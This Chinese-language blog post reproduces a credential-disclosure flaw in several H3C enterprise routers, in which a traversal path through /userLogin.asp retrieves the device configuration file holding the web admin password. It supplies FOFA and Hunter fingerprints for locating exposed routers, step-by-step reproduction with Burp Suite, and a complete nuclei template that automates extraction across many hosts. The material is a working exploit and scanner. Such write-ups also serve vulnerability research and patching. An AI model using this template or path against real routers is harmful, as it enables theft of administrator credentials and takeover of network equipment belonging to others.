首页 > 其他分享 >(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)

(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)

时间:2024-05-26 18:32:36浏览次数:13  
标签:status H3C asp zh actionpolicy userLogin 泄露 路由器

(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1、漏洞简介

漏洞位于/userLogin.asp页面,通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg,可获取设备配置文件,进而获得WEB管理账号及密码

2、资产指纹

fofa:app=“H3C-Ent-Router”
hunter:app.name=“H3C Router Management”

3、漏洞复现

访问路由器web页面,获取页面title中的路由器型号,以下图为例,路由器型号为ER8300G2。在这里插入图片描述
http://ip//userLogin.asp/…/actionpolicy_status/…/型号.cfg依据路由器型号拼接url:http://ip//userLogin.asp/…/actionpolicy_status/…/ER8300G2.cfg使用burpsuite发送请求,获得管理员密码等敏感信息。在这里插入图片描述

4、nuclei yaml文件

id: h3cinfor

info:
  name: h3cinfor
  author: xxx
  severity: critical
  description: 华三路由器存在敏感信息泄露漏洞


http:
  - raw:
    - |
      GET /userLogin.asp HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Upgrade-Insecure-Requests: 1
      Sec-Fetch-Dest: document
      Sec-Fetch-Mode: navigate
      Sec-Fetch-Site: none
      Sec-Fetch-User: ?1
      Priority: u=1
      Te: trailers
      Connection: close
      
    - |
      GET /userLogin.asp/../actionpolicy_status/../{{id}}.cfg HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Upgrade-Insecure-Requests: 1
      Priority: u=1
    
    extractors:
      - type: regex
        name: id
        group: 1
        regex: 
         - "<title>(.*?)系统管理</title>"
        internal: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2==200 && (contains_all(body_2,"vtypasswd"))'

标签:status,H3C,asp,zh,actionpolicy,userLogin,泄露,路由器
From: https://blog.csdn.net/nglj9527/article/details/139123242

相关文章

  • H3C NAT实验(一看就会版)
    实验目的1.掌握BasicNAT的配置方法;2.掌握NAPT的配置方法;3.掌握EasyIP的配置方法;4.掌握NATServer的配置方法。实验拓扑图(设备已更名)1.配置IP地址注意网关的指定接口和单臂路由中的接口之间的匹配;为PC配置网关:[FTP]iproute-static0.0.0......
  • 隐藏服务器 IP 很重要,但封堵泄露服务器 IP 的环节更重要
    明月一直都在提倡博客网站要注意隐藏服务器真实IP的观点,主要是明月自己的经历太深刻了,服务器真实IP泄露造成的后果损失是无法估量的,甚至往往会带来毁灭性的后果都不是不可能。比如: DDos/CC攻击、刷流量、后门植入、恶意扫描、漏洞入侵等等很多不可预料的危害。当然,隐藏服......
  • 打印安全:防止打印过程中的商业机密泄露
    在数字化办公日益普及的今天,打印安全常常成为企业信息保护中被忽视的一环。商业机密在打印过程中泄露,可能会给企业带来巨大的损失。本文将探讨如何通过一系列措施,确保打印过程中的商业机密安全。一、打印安全的重要性打印设备作为企业中常见的输出工具,经常处理敏感文件和商业机......
  • jmeter警告:WARN StatusConsoleListener The use of package scanning to locate plugi
    运行jmeter,出现警告信息 警告信息:WARNStatusConsoleListenerTheuseofpackagescanningtolocatepluginsisdeprecatedandwillberemovedinafuturerelease意思是,JMeter在将来的版本中将移除使用包扫描来定位插件的功能 如果想不显示警告信息,可以修改JMeter......
  • 企业源代码泄露?这几招教你如何避免这场灾难
    网络时代下的企业机密:如何防范源代码泄露风险在数字化的网络时代,企业机密尤其是源代码的安全保护,已成为软件开发企业关注的焦点。源代码不仅是企业的核心竞争力,更是创新成果的体现。一旦源代码泄露,不仅会造成巨大的经济损失,还会使企业在激烈的市场竞争中处于不利地位。因此,如何有......
  • rabbitMq的status报错Error: unable to perform an operation on node ‘rabbit……
    遇到下图这个错大部分问题可能是由于 RabbitMQ CLI工具的ErlangCookie与服务器上的不匹配而导致连接问题。ErlangCookie在RabbitMQ节点之间进行身份验证和安全通信时起着重要作用。可以在c盘搜索一下看下两个.erlang.cookie文件中的内容是否一致,不一致的话就改成一致的......
  • Unity性能优化:什么是内存泄露?
    内存泄漏是优化方面的名词,主要是由于不再使用的资源没有及时清理,来释放内存,造成内存的浪费,造成系统卡顿。 或者说,内存就像花呗,额度就这么多,有借要有还,而且手里有闲钱的时候就记得还,以保证内存的充足,如果占着不用,就会在其他需要使用的时候内存不足,就容易崩溃出现问题。 Unity......
  • 危机四伏:如何识别并防范企业内部数据泄露
    在数字化时代,企业的数据成为了宝贵的资产,但同时也面临着前所未有的风险。内部数据泄露尤其危险,因为它可能不仅来自外部的黑客攻击,更多时候是由于内部员工的疏忽或恶意行为。因此,识别和防范企业内部数据泄露是维护企业数据安全的关键。下面,我们将探讨如何有效识别和防范这一风险。......
  • 中移铁通禹路由 ExportSettings 敏感信息泄露漏洞
    漏洞描述:该漏洞由于cgi-bin/ExportSettings.sh未对用户进行身份验证,导致攻击者能够未授权获取到路由器设置信息,包含了后台管理员用户的账号和密码fofa:title="互联世界物联未来-登录"鹰图:web.body="互联世界物联未来-登录"POC:GET/cgi-bin/ExportSettings.sh漏洞复现:......
  • 怎样才能不当数据泄露的下一个受害者?
    在数字化时代,数据泄露成为了所有企业必须面对的难题。无论规模大小,每家公司都可能成为黑客攻击的目标,从而遭受数据泄露的风险。然而,通过采取一系列预防措施,企业可以极大地降低成为下一个受害者的可能性。教育员工:增强数据安全意识员工往往是数据泄露的最大风险源之一,因此提升员......